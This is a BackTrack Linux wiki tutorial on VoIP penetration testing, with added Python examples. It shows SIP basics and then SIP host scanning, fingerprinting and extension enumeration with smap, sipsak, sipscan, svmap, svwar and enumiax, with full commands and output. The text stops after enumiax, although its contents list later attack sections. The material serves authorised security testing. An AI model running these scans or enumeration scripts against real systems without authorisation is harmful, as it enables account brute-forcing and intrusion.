
7/12/2015

Pentesting VOIP - BackTrack Linux

Pentesting VOIP
From BackTrack Linux
This article was contributed by NightRang3r.
URL: http://www.backtrack.de/index.php?page=team#smtx
Twitter: http://twitter.com/#!/NightRang3r
Email: shai@exploit.co.il

Contents
1 Penetration Testing VOIP with BackTrack
2 Typical VoIP Topologies
2.1 Self Hosted
2.2 Hosted Services
2.3 Online SIP Service
3 SIP Basics
3.1 SIP Requests/Methods
3.1.1 An Example SIP INVITE Request:
3.2 SIP Responses
3.2.1 An Example SIP Trying Response:
3.3 SIP Call Between 2 Phones Example
4 Attack Vectors
5 Information Gathering
5.1 SMAP
5.1.1 SMAP Usage:
5.1.2 Scanning a single host:
5.1.3 Scanning a range of IP addresses:
5.2 SIPSAK
5.3 SIPScan
5.3.1 Sipscan usage:
5.3.2 Scanning a subnet:
5.4 SVMAP
5.4.1 Scanning an IP range:
5.4.2 Enabling fingerprinting scanning
5.5 Extensions Enumeration
5.5.1 Svwar
5.5.1.1 Usage:
5.5.1.2 Example:
5.5.2 Enumiax
6 Monitoring Traffic and Eavesdropping Phone calls
6.1 Arp Poisoning using Arpspoof
6.2 Capturing traffic and Eavesdropping using Wireshark
6.3 VoIPong
6.3.1 Playing the file:
6.4 Vomit
6.5 UCsniff
6.5.1 Monitor Mode Usage
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

1/40

6.5.2 MITM Learning Mode Usage
6.5.3 MITM Target Mode
6.6 Xplico
6.7 Capturing SIP Authentication using SIPDump
7 Attacking Authentication
7.1 Cracking SIP Digest response hashes
7.1.1 SIPCrack Usage:
7.1.2 Dictionary attack
7.1.2.1 Creating a six chars numeric dictionary:
7.1.2.2 Cracking the Digest Response:
7.1.3 Brute Force attack using John The Ripper
7.2 Brute forcing SIP Accounts
8 VLAN Hopping
8.1 VoIP Hopper
8.2 ACE
9 Denial Of Service
9.1 Inviteflood
9.2 Rtpflood
9.3 Iaxflood
9.4 Teardown
10 Spoofing Caller ID
11 Attacking VoIP Using Metasploit
11.1 Metasploit VoIP Modules
11.1.1 Auxiliaries
11.1.2 Exploits
11.2 Scanning SIP Enabled Devices
11.3 Enumerating SIP extensions/Usernames
11.4 Spoofing Caller ID auxiliary
11.5 Exploiting VoIP systems
12 Closing Words
13 About The Author
14 References

Penetration Testing VOIP with BackTrack

VoIP is an exciting technology which provides many benefits and cost effective solutions for communication. More and more businesses and enterprises are replacing their old traditional telephony systems with IP based ones. A VoIP based PBX can provide many features such as: multiple extensions, Caller ID, voicemail, IVR capabilities, recording of conversations, usage with hardware based telephones or software based ones (aka softphones). Nowadays there are many vendors for PBXs, IP telephones, VoIP services and equipment, such as: CISCO, AVAYA, ASTERISK, SNOM and THOMSON. With new technology comes a new challenge for both the defensive and offensive side of security. One of the great dangers of traditional phone systems was that they were susceptible to eavesdropping. The old school way to eavesdrop on somebody's phone line was to physically connect a small transmitter somewhere along the phone cord, inside or outside their premises.


IP telephony systems are also susceptible to eavesdropping. Doing so in an IP environment is a little bit more difficult to execute and detect, and it requires more knowledge and the right set of tools. In this article we won't discuss a particular vendor or technology; we will take a look at the concepts and the tools available for attacking VoIP that are available to us in BackTrack Linux. The main purpose of this article is to present the tools and their purpose in order to help you choose the right tool for the right situation. We will look at some real world attack vectors and discover how BackTrack can assist us in pentesting VoIP; we will also examine some of the tools which are present in BackTrack and their usage.

Typical VoIP Topologies
There are several ways IP based telephony can be implemented; here are some common topologies and usage:

Self Hosted

A PBX (i.e. Asterisk) is installed at the client site and connected to an ISP or telephony service provider (PSTN) via a SIP trunk; the VoIP traffic flows through a dedicated VLAN.

Visio diagram by Amir Avraham

Hosted Services

There is no need for a PBX at the site. Just a switch, a router, IP phones and a connection to the service provider's PBX via an internet or IP/VPN connection; each phone is configured with SIP account information.


Online SIP Service

Services like sipme.me provide an application for PCs or smartphones and a free SIP account, offering low prices for international calls and free calls between the service's users by assigning a phone number to each subscriber.


SIP Basics

The SIP (Session Initiation Protocol) role is to set up, terminate or modify a voice or a video call, where the voice and/or video is being carried by a protocol like RTP (Real-time Transport Protocol). SIP is an application layer protocol which uses UDP as transport (TCP and SCTP can be used as well).

SIP usually uses port 5060 TCP or UDP for unencrypted signaling, or 5061 for encrypted transport using TLS. Note that TLS on 5061 protects only the signaling; the RTP media stream is a separate flow and needs SRTP to be protected, otherwise the call audio can still be captured.

SIP is an ASCII based protocol which has some elements similar to the HTTP protocol, using a Request/Response model. Much like an HTTP request from a browser, a SIP client request is made using a SIP URI, a user agent and a method/request. SIP uses an email like address format: user/phone@domain/ip. A typical SIP URI looks like:
sip:205@192.168.1.100, sip:username@pbx.com, sip:205@192.168.1.100:5060

According to the request made by the client a response will be received with a status or error code; the following tables describe the available requests and responses in the SIP protocol.

SIP Requests/Methods

Request    Description
INVITE     Used to invite an account to participate in a call session.
ACK        Acknowledge an INVITE request.
CANCEL     Cancel a pending request.
REGISTER   Register user with a SIP server.
OPTIONS    Lists information about the capabilities of a caller.
BYE        Terminates a session between two users in a call.
REFER      Indicates that the recipient (identified by the Request-URI) should contact a third party using the contact information provided in the request.
SUBSCRIBE  The SUBSCRIBE method is used to request current state and state updates from a remote node.
NOTIFY     The NOTIFY method is used to notify a SIP node that an event which has been requested by an earlier SUBSCRIBE method has occurred.

An Example SIP INVITE Request:

INVITE sip:201@192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar
Max-Forwards: 70
To:
From: "NightRanger";tag=eihgg
Call-ID: hfxsabthoymshub@backtrack
CSeq: 649 INVITE
Contact:
Content-Type: application/sdp
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported: replaces,norefersub,100rel
User-Agent: Twinkle/1.2
Content-Length: 310

SIP Responses

Response  Description
1xx       Informational responses: request received and being processed.
2xx       Successful responses: the action was successfully received, understood, and accepted.
3xx       Redirection responses.
4xx       Request failure responses: the request contains bad syntax or cannot be fulfilled at the server.
5xx       Server failure responses: the server failed to fulfill an apparently valid request.
6xx       Global failure responses: the request cannot be fulfilled at any server.

An Example SIP Trying Response:

SIP/2.0 100 Trying
Via: SIP/2.0/UDP 192.168.1.102;branch=z9hG4bKpmphujka;received=192.168.1.102;rport=5060
From: "NIghtRanger";tag=eihgg
To:
Call-ID: hfxsabthoymshub@backtrack
CSeq: 650 INVITE
User-Agent: Asterisk PBX
Allow: INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY
Supported: replaces
Contact:
Content-Length: 0

SIP Call Between 2 Phones Example

The calling phone sends an INVITE.
The called phone sends back a response of 100 (Trying).
The called phone then starts to ring and sends a response of 180 (Ringing).
When the called party picks up the phone, the called phone sends a response of 200 (OK).
The calling phone sends an ACK request.
Conversation begins via RTP.
When either party hangs up, their phone sends a BYE request.
The other phone responds with 200 (OK).
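The message format and the call flow above are easy to check in code. The following is an added example, not code from the original article: a small parser for the ASCII request/response format shown in the INVITE and 100 Trying examples, plus a check that a sequence of messages really is the INVITE/100/180/200/ACK/BYE/200 flow for a single Call-ID. The seven sample messages are constructed here; the caller extension 200 at 192.168.1.102, the tags and the branch values are assumptions, while 201@192.168.1.104 and the Call-ID come from the article's INVITE.

```python
"""Parse SIP messages and verify the two-phone call flow described above.

Added example, not code from the original article. The sample messages
are constructed: caller 200 at 192.168.1.102 (assumed) calls
201@192.168.1.104 (from the article's INVITE).
"""
import re
from typing import Dict, List, Optional

# Compact header forms that some user agents emit (RFC 3261 section 7.3.3).
COMPACT = {"v": "Via", "f": "From", "t": "To", "i": "Call-ID",
           "m": "Contact", "l": "Content-Length", "c": "Content-Type"}

RESPONSE_CLASSES = {
    1: "Informational", 2: "Success", 3: "Redirection",
    4: "Request failure", 5: "Server failure", 6: "Global failure",
}


def parse_sip(raw: str) -> Dict:
    """Split a SIP message into start line, headers and body."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    start = lines[0]
    msg: Dict = {"headers": {}, "body": body}
    if start.startswith("SIP/2.0 "):            # status line, e.g. SIP/2.0 100 Trying
        _, code, reason = start.split(" ", 2)
        msg.update(kind="response", code=int(code), reason=reason,
                   cls=RESPONSE_CLASSES.get(int(code) // 100, "Unknown"))
    else:                                       # request line, e.g. INVITE sip:201@host SIP/2.0
        method, uri, version = start.split(" ", 2)
        if version != "SIP/2.0":
            raise ValueError("not a SIP/2.0 request: %r" % start)
        msg.update(kind="request", method=method, uri=uri)
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name = COMPACT.get(name.strip(), name.strip())
        # Normalise header names to canonical capitalisation (call-id -> Call-ID).
        key = "-".join(p.capitalize() for p in name.split("-"))
        key = {"Call-Id": "Call-ID", "Cseq": "CSeq"}.get(key, key)
        msg["headers"][key] = value.strip()
    return msg


def sip_uri_user(uri: str) -> Optional[str]:
    """Extract the user/extension part of sip:205@192.168.1.100:5060 or <sip:...>."""
    m = re.search(r"sips?:([^@>;]+)@", uri)
    return m.group(1) if m else None


def check_call_flow(messages: List[str]) -> List[str]:
    """Return the observed flow after verifying it is the INVITE -> 100 -> 180 -> 200
    -> ACK -> BYE -> 200 sequence within a single dialog (one Call-ID)."""
    parsed = [parse_sip(m) for m in messages]
    call_ids = {p["headers"].get("Call-ID") for p in parsed}
    if len(call_ids) != 1:
        raise ValueError("messages span several dialogs: %r" % call_ids)
    flow = []
    for p in parsed:
        if p["kind"] == "request":
            flow.append(p["method"])
        else:
            # A response carries the CSeq of the request it answers.
            flow.append("%d %s (for %s)" % (p["code"], p["reason"],
                                            p["headers"]["CSeq"].split()[1]))
    expected = ["INVITE", "100 Trying (for INVITE)", "180 Ringing (for INVITE)",
                "200 OK (for INVITE)", "ACK", "BYE", "200 OK (for BYE)"]
    if flow != expected:
        raise ValueError("unexpected flow: %r" % flow)
    return flow


def _msg(start: str, cseq: str, extra: str = "") -> str:
    """Constructed sample message; all share one Call-ID (test data, not a capture)."""
    return (start + "\r\n"
            "Via: SIP/2.0/UDP 192.168.1.102;branch=z9hG4bKvbxaoqar\r\n"
            "From: \"NightRanger\" <sip:200@192.168.1.102>;tag=eihgg\r\n"
            "To: <sip:201@192.168.1.104>\r\n"
            "Call-ID: hfxsabthoymshub@backtrack\r\n"
            "CSeq: " + cseq + "\r\n" + extra + "Content-Length: 0\r\n\r\n")


SAMPLE_CALL = [
    _msg("INVITE sip:201@192.168.1.104 SIP/2.0", "649 INVITE", "User-Agent: Twinkle/1.2\r\n"),
    _msg("SIP/2.0 100 Trying", "649 INVITE"),
    _msg("SIP/2.0 180 Ringing", "649 INVITE"),
    _msg("SIP/2.0 200 OK", "649 INVITE"),
    _msg("ACK sip:201@192.168.1.104 SIP/2.0", "649 ACK"),     # ACK reuses the INVITE's CSeq number
    _msg("BYE sip:201@192.168.1.104 SIP/2.0", "650 BYE"),
    _msg("SIP/2.0 200 OK", "650 BYE"),
]

if __name__ == "__main__":
    inv = parse_sip(SAMPLE_CALL[0])
    print(inv["method"], inv["uri"], "-> callee", sip_uri_user(inv["uri"]))
    for step in check_call_flow(SAMPLE_CALL):
        print(step)
```

The Call-ID plus CSeq pairing is what lets a sniffer (or an IDS) tie responses back to the request they answer; the same two headers are what the enumeration and authentication tools later in this article key on.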

Attack Vectors

Before we get started with the tools, let's have a look at some common VoIP attack vectors:
Information Gathering, Footprinting and Enumeration.
Monitoring Traffic and eavesdropping Phone calls.
Attacking Authentication.
VLAN Hopping.
Denial of Service/Flooding.
Spoofing Caller ID.

In order to test the tools I have set up a TRIXBOX PBX system and created 6 extensions. I will be using two softphones: the first is a Linux based client called Twinkle and the 2nd is a Windows based client called X-Lite. I will be using the latest and greatest release of BackTrack Linux, which is R2. You can find most of the VoIP attack tools in BackTrack under the /pentest/voip/ directory:

root@bt:~# cd /pentest/voip/
root@bt:/pentest/voip#

Or you can simply navigate using the KDE menu to the Backtrack > Voice Over IP submenus:

Information Gathering

This phase is where we gather information about the topology, servers and clients, to learn as much as we can before launching an attack. What we are interested in finding is live hosts, PBX type and version, VoIP servers/gateways, client (hardware and software) types and versions, etc. Instead of enumerating usernames we will be enumerating SIP extensions. Let's take a look at some of the tools available in BackTrack to help us find, identify and enumerate VoIP enabled devices.
SMAP

BackTrack includes a great tool called SMAP, which is a simple scanner for SIP enabled devices. SMAP sends off various SIP requests awaiting responses from SIP enabled DSL routers, proxies and user agents.
It could be considered a mashup of NMAP and sipsak.
SMAP Usage:

root@bt:/pentest/voip/smap# ./smap
smap 0.6.0 http://www.wormulon.net/
usage: smap [Options]
-h: this help
-d: increase debugging
-o: enable fingerprinting
-O: enable more verbose fingerprinting
-l: fingerprint learning mode
-t: TCP transport
-u: UDP transport (default)
-P0: Treat all hosts as online - skip host discovery
-p: destination port
-r: messages per second rate limit
-D: SIP domain to use without leading sip:
-w: timeout in msec

Scanning a single host:

root@bt:/pentest/voip/smap# ./smap 192.168.1.104
smap 0.6.0 http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

Scanning a range of IP addresses:

root@bt:/pentest/voip/smap# ./smap 192.168.1.130/24
smap 0.6.0 http://www.wormulon.net/
192.168.1.20: ICMP reachable, SIP enabled
192.168.1.22: ICMP reachable, SIP enabled
192.168.1.0: ICMP unreachable, SIP disabled
192.168.1.1: ICMP unreachable, SIP disabled
192.168.1.2: ICMP unreachable, SIP disabled
192.168.1.3: ICMP unreachable, SIP disabled
...
192.168.1.250: ICMP unreachable, SIP disabled
192.168.1.251: ICMP unreachable, SIP disabled
192.168.1.252: ICMP unreachable, SIP disabled
192.168.1.253: ICMP unreachable, SIP disabled
192.168.1.254: ICMP unreachable, SIP disabled
192.168.1.255: ICMP unreachable, SIP disabled
256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)

Now that we have identified SIP enabled hosts we can use SMAP to fingerprint the server/client type and version:
root@bt:/pentest/voip/smap# ./smap -O 192.168.1.104
smap 0.6.0 http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint:
  Asterisk PBX SVN trunk r56579
  User-Agent: Asterisk PBX
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

In case SMAP could not fingerprint our host, we use the -l argument to put it in learning mode, which prints the raw header observations it bases the guess on:
root@bt:/pentest/voip/smap# ./smap -l 192.168.1.104
smap 0.6.0 http://www.wormulon.net/
NOTICE: test_accept: "Accept: application/sdp"
NOTICE: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY"
NOTICE: test_supported: "Supported: replaces"
NOTICE: test_via: transport capitalization: 2
NOTICE: test_via: "branch;alias;received;rport"
NOTICE: test_via: Please add new cmpstr
NOTICE: test_via: transport capitalization: 2
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint:
  Asterisk PBX SVN trunk r56579
FINGERPRINT information:
newmethod=501
accept_class=2
allow_class=201
supported_class=8
via_class=2
hoe_class=ignore
options=200
brokenfromto=404
prack=481
ping=501
invite=200
  User-Agent: Asterisk PBX
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

Another useful feature of SMAP is the -d argument, which enables debug output; use -o along with it to see the fingerprinting process in detail.
root@bt:/pentest/voip/smap# ./smap -d 192.168.1.104
smap 0.6.0 http://www.wormulon.net/
DEBUG: local IP: 212.235.66.182
DEBUG: local IP: 212.235.66.182
DEBUG: bind() successful
DEBUG: RAW socket open
DEBUG: moving 1 from S_START to S_PING
DEBUG: ICMP error Echo Reply
DEBUG: 192.168.1.104/1 request: SIP OPTIONS request (valid)
DEBUG: response belongs to task 1 (192.168.1.104)
DEBUG: ACK: ACK sip:localhost SIP/2.0
Via: SIP/2.0/UDP 212.235.66.182:12345;branch=z9hG4bK.56689;alias;received=192.168.1.105;rport=5060
From: ;tag=6b9ae50e67345d3b
To: ;tag=as14262fec
Call-ID: 1992951560@212.235.66.182
CSeq: 23915 ACK
Content-Length: 0
User-Agent: smap 0.6.0
end of ACK
192.168.1.104: ICMP reachable, SIP enabled
DEBUG: destroying task 1
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

SIPSAK

SIPSAK is a command line tool for testing SIP enabled applications and devices. In its default "shoot" mode it sends a single OPTIONS request and prints the reply (other modes, such as usrloc, use REGISTER), which makes it handy for fingerprinting and enumeration. You won't find sipsak in the /pentest/voip/ directory; you can execute it from any location by typing sipsak.

root@bt:~# sipsak
sipsak 0.9.6 by Nils Ohlmeier
Copyright (C) 2002-2004 FhG Fokus
Copyright (C) 2004-2005 Nils Ohlmeier
report bugs to nils@sipsak.org
shoot   : sipsak [-f FILE] [-L] -s SIPURI
trace   : sipsak -T -s SIPURI
usrloc  : sipsak -U [-I|M] [-b NUMBER] [-e NUMBER] [-x NUMBER] [-z NUMBER] -s SIPURI
usrloc  : sipsak -I|M [-b NUMBER] [-e NUMBER] -s SIPURI
usrloc  : sipsak -U [-C SIPURI] [-x NUMBER] -s SIPURI
message : sipsak -M [-B STRING] [-O STRING] [-c SIPURI] -s SIPURI
flood   : sipsak -F [-e NUMBER] -s SIPURI
random  : sipsak -R [-t NUMBER] -s SIPURI
additional parameter in every mode:
   [-a PASSWORD] [-d] [-i] [-H HOSTNAME] [-l PORT] [-m NUMBER] [-n] [-N]
   [-r PORT] [-v] [-V] [-w]
-h           displays this help message
-V           prints version string only
-f FILE      the file which contains the SIP message to send
             use - for standard input
-L           deactivate CR (\r) insertion in files
-s SIPURI    the destination server uri in form
             sip:[user@]servername[:port]
-T           activates the traceroute mode
-U           activates the usrloc mode
-I           simulates a successful calls with itself
-M           sends messages to itself
-C SIPURI    use the given uri as Contact in REGISTER
-b NUMBER    the starting number appendix to the user name (default: 0)
-e NUMBER    the ending numer of the appendix to the user name
-o NUMBER    sleep number ms before sending next request
-x NUMBER    the expires header field value (default: 15)
-z NUMBER    activates randomly removing of user bindings
-F           activates the flood mode
-R           activates the random modues (dangerous)
-t NUMBER    the maximum number of trashed character in random mode
             (default: request length)
-l PORT      the local port to use (default: any)
-r PORT      the remote port to use (default: 5060)
-p HOSTNAME  request target (outbound proxy)
-H HOSTNAME  overwrites the local hostname in all headers
-m NUMBER    the value for the max-forwards header field
-n           use FQDN instead of IPs in the Via-Line
-i           deactivate the insertion of a Via-Line
-a PASSWORD  password for authentication
             (if omitted password="")
-u STRING    Authentication username
-d           ignore redirects
-v           each v produces more verbosity (max. 3)
-w           extract IP from the warning in reply
-g STRING    replacement for a special mark in the message
-G           activates replacement of variables
-N           returns exit codes Nagios compliant
-q STRING    search for a RegExp in replies and return error
             on failure
-W NUMBER    return Nagios warning if retrans > number
-B STRING    send a message with string as body
-O STRING    Content-Disposition value
-P NUMBER    Number of processes to start
-A NUMBER    number of test runs and print just timings
-S           use same port for receiving and sending
-c SIPURI    use the given uri as From in MESSAGE
-D NUMBER    timeout multiplier for INVITE transactions
             and reliable transports (default: 64)
-E STRING    specify transport to be used
-j STRING    adds additional headers to the request

Here is an example of using sipsak to fingerprint a SIP enabled device. We can see in the result (the Server header) that the device we queried is an Audiocodes MP-114 FXS gateway, and the SDP body also reveals the codecs it offers.
root@bt:~# sipsak -vv -s sip:192.168.1.221
message received:
SIP/2.0 200 OK
Via: SIP/2.0/UDP 127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;alias
From: sip:sipsak@127.0.1.1:51601;tag=97ac9e5
To: sip:192.168.1.221;tag=1c1785761661
Call-ID: 159042021@127.0.1.1
CSeq: 1 OPTIONS
Contact:
Supported: em,100rel,timer,replaces,path,resource-priority
Allow: REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SUBSCRIBE,UPDATE
Server: Audiocodes Sip Gateway MP114 FXS/v.5.40A.040.005
X-Resources: telchs=4/0;mediachs=0/0
Accept: application/sdp, application/simple-message-summary, message/sipfrag
Content-Type: application/sdp
Content-Length: 343
v=0
o=AudiocodesGW 1785763980 1785763858 IN IP4 192.168.1.221
s=Phone-Call
c=IN IP4 192.168.1.221
t=0 0
m=audio 6000 RTP/AVP 18 8 0 127
a=rtpmap:18 G729/8000
a=fmtp:18 annexb=no
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:127 telephone-event/8000
a=fmtp:127 0-15
a=ptime:20
a=sendrecv
a=rtcp:6001 IN IP4 192.168.1.221

** reply received after 67.923 ms **
SIP/2.0 200 OK
final received

SIPScan
Sipscan is a simple scanner for SIP enabled hosts; it can scan a single host or an entire subnet.
Sipscan usage:

root@bt:/pentest/voip/sipscan# ./sipscan --help
./sipscan version [unknown] calling Getopt::Std::getopts (version 1.05),
running under Perl version 5.10.0.
Usage: sipscan [options]
-v        Be verbose.
-i ip|if  Interface/IP for SIP headers (default: IP from ppp0)
-p port   remote port to scan. (default: 5060)
-l port   local origin of packets. (default: 5060)
-d n[p]   Wait n ms after each sent packet (default: 50ms) or if 'p' is
          given, send n packets per second (default: 20)
-w n      Wait n ms for remaining answers (default: 2000ms)
Network spec contains the wildcard * or ranges n-m.

Scanning a subnet:

root@bt:/pentest/voip/sipscan# ./sipscan -i eth0 192.168.1.1-254
192.168.1.20: Grandstream HT502 V1.2A 1.0.1.35
192.168.1.21: Grandstream HT502 V1.2A 1.0.1.35
192.168.1.22: Asterisk PBX
192.168.1.104: Asterisk PBX
192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055
192.168.1.174: Grandstream HT502 V1.2A 1.0.1.35
192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27
192.168.1.219: "Exelmind Call Control Switch (CCS)"
192.168.1.248: MailVision HostLynx/2.1 'GA'

SVMAP

SVMAP is part of a suite of tools called SIPVicious and it's my favorite scanner of choice. It can be used to scan, identify and fingerprint a single IP or a range of IP addresses. Svmap allows specifying the request method which is used for scanning; the default method is OPTIONS. It offers debug and verbosity options and even allows scanning the SRV records for SIP on the destination domain. You can use ./svmap.py -h in order to view all the available arguments.

root@bt:/pentest/voip/sipvicious# ./svmap.py
Usage: svmap.py [options] host1 host2 hostrange
examples:
svmap.py 10.0.0.1-10.0.0.255 \
> 172.16.131.1 sipvicious.org/22 10.0.1.1/24 \
> 1.1.1.1-20 1.1.2-20.* 4.1.*.*
svmap.py -s session1 --randomize 10.0.0.1/8
svmap.py --resume session1 -v
svmap.py -p5060-5062 10.0.0.3-20 -m INVITE

Scanning an IP range:

root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254
| SIP Device         | User Agent    | Fingerprint |
----------------------------------------------------
| 192.168.1.104:5060 | Asterisk PBX  | disabled    |
| 192.168.1.103:5060 | Twinkle/1.4.2 | disabled    |

Enabling fingerprinting scanning

root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254 --fp

Extensions Enumeration

Extension enumeration can aid an attacker by finding valid extensions on a VoIP system, which later can lead to a brute force attack on the SIP accounts. Extension enumeration works by examining the different responses returned by a SIP request method like REGISTER, OPTIONS or INVITE: a server that answers "404 Not Found" for an unknown extension but "401 Unauthorized" (or "407") for a real one is leaking which extensions exist.
Svwar

Svwar is also a tool from the SIPVicious suite. It allows enumerating extensions using a range of extensions or a dictionary file. Svwar supports all three of the extension enumeration methods mentioned above; the default method for enumeration is REGISTER.
Usage:

root@bt:/pentest/voip/sipvicious# ./svwar.py
Usage: svwar.py [options] target
examples:
svwar.py -e100-999 10.0.0.1
svwar.py -d dictionary.txt 10.0.0.2


Example:

root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104
| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 203       | reqauth        |
| 202       | reqauth        |
| 303       | reqauth        |
| 305       | reqauth        |

Svwar has identified all the extensions I've created on my Trixbox server. You can specify another SIP method by using the -m argument; you can also add -v or -vv for verbosity. Keep in mind that -m INVITE actually places calls, so every extension it probes will ring; prefer REGISTER or OPTIONS on a production system.
root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104 -m INVITE -v
INFO:TakeASip:trying to get self ip .. might take a while
INFO:root:start your engines
INFO:TakeASip:Ok SIP device found
INFO:TakeASip:extension '200' exists - requires authentication
INFO:TakeASip:extension '201' exists - requires authentication
INFO:TakeASip:extension '202' exists - requires authentication
INFO:TakeASip:extension '203' exists - requires authentication
INFO:TakeASip:extension '303' exists - requires authentication
INFO:TakeASip:extension '305' exists - requires authentication
INFO:root:we have 6 extensions
| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 203       | reqauth        |
| 202       | reqauth        |
| 303       | reqauth        |
| 305       | reqauth        |
INFO:root:Total time: 0:00:21.944731
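The two probes behind the svmap and svwar runs above (an OPTIONS request for fingerprinting, a REGISTER request per extension for enumeration) are short enough to build by hand. The following is an added example, not code from the original article or from the SIPVicious project: it builds both requests, pulls the fingerprint out of the OPTIONS reply, and classifies REGISTER replies the way svwar reports them ("reqauth" for 401/407, "noauth" for 200, absent for 404). Instead of a live PBX it talks to fake_pbx(), a constructed stand-in that answers like the article's Trixbox/Asterisk server; the extension set and the IP 192.168.1.104 come from the scan output above, while the realm, nonce and scanner source address are assumptions.

```python
"""OPTIONS fingerprinting and REGISTER based extension enumeration.

Added example, not code from the original article or from SIPVicious.
fake_pbx() is a constructed test double for the Asterisk PBX at
192.168.1.104; the realm/nonce and the scanner IP are assumptions.
"""
import random
import string
from typing import Callable, Dict

KNOWN_EXTENSIONS = {"200", "201", "202", "203", "303", "305"}  # from the svwar run above
TARGET = "192.168.1.104"


def _branch() -> str:
    # A Via branch must start with the RFC 3261 magic cookie z9hG4bK.
    return "z9hG4bK" + "".join(random.choice(string.ascii_lowercase) for _ in range(8))


def build_request(method: str, target: str, user: str, src_ip: str = "192.168.1.105") -> str:
    """Build a minimal SIP request (OPTIONS or REGISTER) as a scanner would."""
    uri = "sip:%s@%s" % (user, target) if user else "sip:%s" % target
    to_from = "<%s>" % uri
    return ("%s %s SIP/2.0\r\n"
            "Via: SIP/2.0/UDP %s:5060;branch=%s;rport\r\n"
            "Max-Forwards: 70\r\n"
            "From: %s;tag=%08x\r\n"
            "To: %s\r\n"
            "Call-ID: %08x@%s\r\n"
            "CSeq: 1 %s\r\n"
            "Contact: <sip: %s@%s:5060>\r\n"
            "User-Agent: added-example-scanner\r\n"
            "Content-Length: 0\r\n\r\n"
            % (method, uri, src_ip, _branch(), to_from, random.getrandbits(32),
               to_from, random.getrandbits(32), src_ip, method, user or "scanner", src_ip))


def status_code(response: str) -> int:
    return int(response.split(" ", 2)[1])


def header(message: str, name: str) -> str:
    """Return the value of the first header called `name` (case-insensitive)."""
    for line in message.split("\r\n")[1:]:
        if line.lower().startswith(name.lower() + ":"):
            return line.split(":", 1)[1].strip()
    return ""


def fake_pbx(request: str) -> str:
    """Constructed stand-in for the PBX: 401 for real extensions, 404 for unknown ones."""
    method, uri = request.split(" ", 2)[:2]
    user = uri[4:].split("@")[0] if "@" in uri else ""
    common = "Via: %s\r\nCSeq: 1 %s\r\nUser-Agent: Asterisk PBX\r\n" % (header(request, "Via"), method)
    if method == "OPTIONS":
        return ("SIP/2.0 200 OK\r\n" + common +
                "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE\r\nContent-Length: 0\r\n\r\n")
    if method == "REGISTER":
        if user in KNOWN_EXTENSIONS:
            return ("SIP/2.0 401 Unauthorized\r\n" + common +
                    'WWW-Authenticate: Digest realm="asterisk", nonce="4e1a2b3c"\r\n'
                    "Content-Length: 0\r\n\r\n")
        return "SIP/2.0 404 Not Found\r\n" + common + "Content-Length: 0\r\n\r\n"
    return "SIP/2.0 501 Not Implemented\r\n" + common + "Content-Length: 0\r\n\r\n"


def fingerprint(send: Callable[[str], str], target: str) -> str:
    """svmap-style fingerprint: the User-Agent or Server header of an OPTIONS reply."""
    resp = send(build_request("OPTIONS", target, ""))
    if status_code(resp) // 100 not in (2, 4):
        return "no SIP response"
    return header(resp, "User-Agent") or header(resp, "Server") or "unknown"


def classify(resp: str) -> str:
    """Map a REGISTER reply to svwar's vocabulary."""
    code = status_code(resp)
    if code in (401, 407):
        return "reqauth"        # extension exists, password required
    if code == 200:
        return "noauth"         # registered without any credentials
    if code in (403, 404):
        return "absent"
    return "unknown(%d)" % code


def enumerate_extensions(send: Callable[[str], str], target: str,
                         start: int, end: int) -> Dict[str, str]:
    """Send one REGISTER per extension in [start, end] and keep the live ones."""
    found: Dict[str, str] = {}
    for ext in range(start, end + 1):
        verdict = classify(send(build_request("REGISTER", target, str(ext))))
        if verdict != "absent":
            found[str(ext)] = verdict
    return found


if __name__ == "__main__":
    print("fingerprint:", fingerprint(fake_pbx, TARGET))
    for ext, auth in sorted(enumerate_extensions(fake_pbx, TARGET, 100, 400).items()):
        print("| %s | %s |" % (ext, auth))
```

The defensive counterpart is to stop the 401/404 difference from existing: Asterisk's alwaysauthreject=yes option in sip.conf makes it answer unknown and known peers alike, which is what turns this enumeration back into blind guessing.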

Enumiax

Enumiax is used to enumerate Inter-Asterisk eXchange (IAX) protocol usernames. It allows for a dictionary attack or sequential username guessing.

root@bt:/pentest/voip/enumiax# ./enumiax
enumIAX 1.0
Dustin D. Trammell
Usage: enumiax [options] target
options:
  -d <dict>   Dictionary attack using file
  -i <count>  Interval for auto-save (# of operations, default 1000)
  -m #        Minimum username length (in characters)
  -M #        Maximum username length (in characters)
  -r #        Rate-limit calls (in microseconds)
  -s <file>   Read session state from state file
  -v          Increase verbosity (repeat for additional verbosity)
  -V          Print version information and exit
  -h          Print help/usage information and exit
